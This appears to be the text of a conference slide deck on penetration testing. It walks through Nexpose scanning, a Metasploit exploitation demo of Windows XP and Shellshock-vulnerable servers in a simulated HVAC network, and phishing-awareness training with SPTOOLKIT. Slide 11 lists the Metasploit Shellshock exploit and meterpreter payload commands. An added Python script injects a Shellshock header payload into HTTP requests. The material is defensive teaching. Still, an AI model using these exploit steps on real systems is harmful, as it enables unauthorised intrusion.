
ANATOMY OF A PENTEST: PROACTIVE STEPS TO ADDRESS VULNERABILITIES IN YOUR NETWORK Presenter: Robbie Corley Organization: KCTCS Senior.




1 ANATOMY OF A PENTEST: PROACTIVE STEPS TO ADDRESS VULNERABILITIES IN YOUR NETWORK Presenter: Robbie Corley Organization: KCTCS Senior Information Security Analyst

2 Personal Life / Interests Married Bachelor’s in Music Business??? Favorite Show: Seinfeld Favorite Movie(s): Lord of the Rings / Hobbit Trilogy Favorite Aspects of IT Security: Reverse Engineering / Studying Shellcode Finding and Exploiting Software Vulnerabilities ABOUT ME

3 What is a pentest? A pentest is a simulated attack against a system, carried out to prove or disprove the vulnerabilities previously reported by a vulnerability scan. How does it work? You are the attacker: you use exploits tailored to the specific vulnerabilities flagged by your earlier vulnerability scan. LET’S TALK ABOUT PENTESTING

4 Some history on pentesting: pentesting originally required manually compiling each individual exploit to test a vulnerability; the exploits were usually written in different programming languages and were specific to OS builds (XP SP1, XP SP2, etc.). What’s the advantage over a vulnerability scan, and why conduct one? A vulnerability scan merely lays out the foundation for your network risk assessment. A pentest helps you fortify your network by discovering and patching security holes before the attackers do, and it keeps your auditors happy, which in turn keeps your boss happy. Pentesting weeds out false positives from a vulnerability scan while validating the real vulnerabilities. LET’S TALK ABOUT PENTESTING

5 Our goal: to scan and validate vulnerabilities in a simulated environment to demonstrate the effectiveness of a pentest. Recommended vendor: Rapid7 (being an approved PCI scanning vendor is an added plus). Other recommendations: Tenable Nessus; open source: OpenVAS. Why Rapid7? Exploits are pre-compiled and built into the software, so you do not need to go online to search for them. Scanner and pentesting software are both free to try. Software resources used: Nexpose (vulnerability scan solution) and Metasploit (pentesting solution). CONDUCTING YOUR FIRST PENTEST

6 Breakdown: your boss has requested a blind vulnerability/pentest assessment of your HVAC network. Attack vectors used: client side and web. A blind scan? A blind scan/pentest is one where you scan/pentest a network without using known credentials (an unauthenticated, black-box assessment). This helps mimic a realistic cyber attack scenario. HVAC network layout: HVAC A: Windows XP server for the HVAC software. HVAC B: Linux web server for the HVAC web services. HVAC SYSTEM SCAN & PENTEST SIMULATION

7 HVAC SERVER A: SCAN SIMULATION Vulnerability scan results for HVAC A: IP: OS: Windows XP HVAC CONSOLE SERVER (Windows XP left extended support in April 2014, so a console server on it receives no further security patches)

8 HVAC SERVER A: PENTEST SIMULATION Pentest live demo using HVAC A: IP: OS: Windows XP HVAC CONSOLE SERVER

9 HVAC SERVER B: SCAN SIMULATION Vulnerability scan results for HVAC B: IP: OS: Linux HVAC WEB SERVER Shellshock!!!!!! (the bash environment-variable bug, CVE-2014-6271)

10 HVAC SERVER B: PENTEST SIMULATION Pentest live demo using HVAC B: IP: OS: Linux HVAC WEB SERVER

11 PENTEST SHELL COMMANDS USED Commands used, for future reference. To pull up the web console, press Alt + Tilde (~), then:
use exploit/multi/http/apache_mod_cgi_bash_env_exec
set RHOST (our victim box IP address; the option is named RHOSTS in Metasploit 5 and later)
set TARGETURI /cgi-bin/status (path to the vulnerable CGI script)
set PAYLOAD linux/x86/meterpreter/bind_tcp (the payload, not the exploit module; bind_tcp makes the victim listen for our connection, so if a host firewall blocks inbound ports, use a reverse_tcp payload instead)
run
Once in the compromised victim machine’s session, you can open a shell by simply typing “shell”. You will then be greeted with a Linux shell.
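What the apache_mod_cgi_bash_env_exec module automates is worth seeing by hand, because it is the check you would run to confirm a Shellshock scanner hit before loading a payload. Apache’s mod_cgi copies request headers such as User-Agent into environment variables (HTTP_USER_AGENT) before running the CGI script; an unpatched bash that starts from that environment parses a value beginning with "() {" as a function definition and executes whatever follows. The script below is an added example, not code from the presentation or from Metasploit: it builds the raw probe request, classifies a response, and runs the classic local bash test. The target host, port and the /cgi-bin/status path are assumptions taken from the slide; the marker string is constructed for the example.

```python
"""Manual Shellshock (CVE-2014-6271) probe. Added example; not from the slides."""
import socket
import subprocess

# Constructed marker: a vulnerable bash echoes it back in the CGI response body.
MARKER = "SHELLSHOCK_MARKER_7f3a"


def build_probe(target_uri="/cgi-bin/status", host="10.0.0.5"):
    """Return the raw HTTP request the probe sends (host and path are assumptions).

    The leading "echo;" emits the blank line that ends the CGI headers, so the
    marker lands in the HTTP body instead of being swallowed as a bad header.
    """
    payload = f"() {{ :; }}; echo; echo {MARKER}"
    return (
        f"GET {target_uri} HTTP/1.1\r\n"
        f"Host: {host}\r\n"
        f"User-Agent: {payload}\r\n"
        "Connection: close\r\n\r\n"
    )


def is_vulnerable_response(body: str) -> bool:
    """True if the injected command ran and the marker came back in the response."""
    return MARKER in body


def probe_target(host, port=80, target_uri="/cgi-bin/status", timeout=5):
    """Send the probe over plain TCP and classify the reply (needs a live target)."""
    with socket.create_connection((host, port), timeout=timeout) as sock:
        sock.sendall(build_probe(target_uri, host).encode())
        chunks = []
        while True:
            data = sock.recv(4096)
            if not data:
                break
            chunks.append(data)
    return is_vulnerable_response(b"".join(chunks).decode(errors="replace"))


def local_bash_check(bash="bash"):
    """Classic local test: exported function-looking variable with a trailing command.

    Returns True if the local bash executes the trailer (vulnerable), False if it
    only runs the real command (patched), None if bash is not available.
    """
    env = {"x": f"() {{ :; }}; echo {MARKER}", "PATH": "/usr/bin:/bin"}
    try:
        out = subprocess.run([bash, "-c", "echo probe"], env=env,
                             capture_output=True, text=True, timeout=5)
    except (FileNotFoundError, subprocess.TimeoutExpired):
        return None
    return MARKER in out.stdout


if __name__ == "__main__":
    print("local bash vulnerable:", local_bash_check())
    print(build_probe())
```

Run probe_target() only against a host you are authorised to test; the local check is safe to run anywhere and is the quickest way to confirm that a patched bash no longer executes the trailer (a patched bash prints only "probe", usually with a warning on stderr about the ignored function definition).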

12 Why have user awareness training? Users can be more mindful of simple operations that effectively help keep their documents and data safe. We simply cannot monitor all of our users’ actions. Hackers are aware of well-structured network security and seek out easier pathways of entry, e.g. a phishing email directed at an unsuspecting, untrained user. On a personal note: training gives our users a boost of confidence, knowing they are collectively making a difference in keeping themselves and the company more secure. USER AWARENESS TRAINING: PENTESTING USING SOCIAL ENGINEERING MODULES

13 How does it work? Phishing modules use pre-made templates that resemble common phishing emails seen in the wild. Emails can be tailored to redirect users to informative phishing-awareness videos when they interact with a phishing email. What tools do I need? Easiest solution, and what we will be using: SPTOOLKIT. SPTOOLKIT is open source and requires little effort to set up. Rapid7’s Metasploit pentesting software also includes a social engineering module with a Pro license. USER AWARENESS TRAINING: PENTESTING USING SOCIAL ENGINEERING PHISHING MODULES

14 Demo time! Link: https://github.com/sptoolkit/sptoolkit Requirements: an SMTP server, and any Linux box with Apache and MySQL installed. Recommended approach: install Kali Linux, which has Apache and MySQL installed by default (they are not started automatically, hence the commands below). Commands to start MySQL and Apache: service apache2 start; service mysql start USER AWARENESS TRAINING: PHISHING AROUND WITH SPTOOLKIT


16 THAT’S ALL FOLKS This presentation and its supplemental video and software content can be downloaded using the following link: (secure Google Drive repository). Links to resources outside of this repository: SPTOOLKIT setup guide: -> download the Community edition of Metasploit and Nexpose -> Kali Linux, to be used as a pentesting environment and for the SPTOOLKIT social engineering module. Want to chat with me outside of this conference about more IT security topics? Shoot me an email at:

17 QUESTIONS???




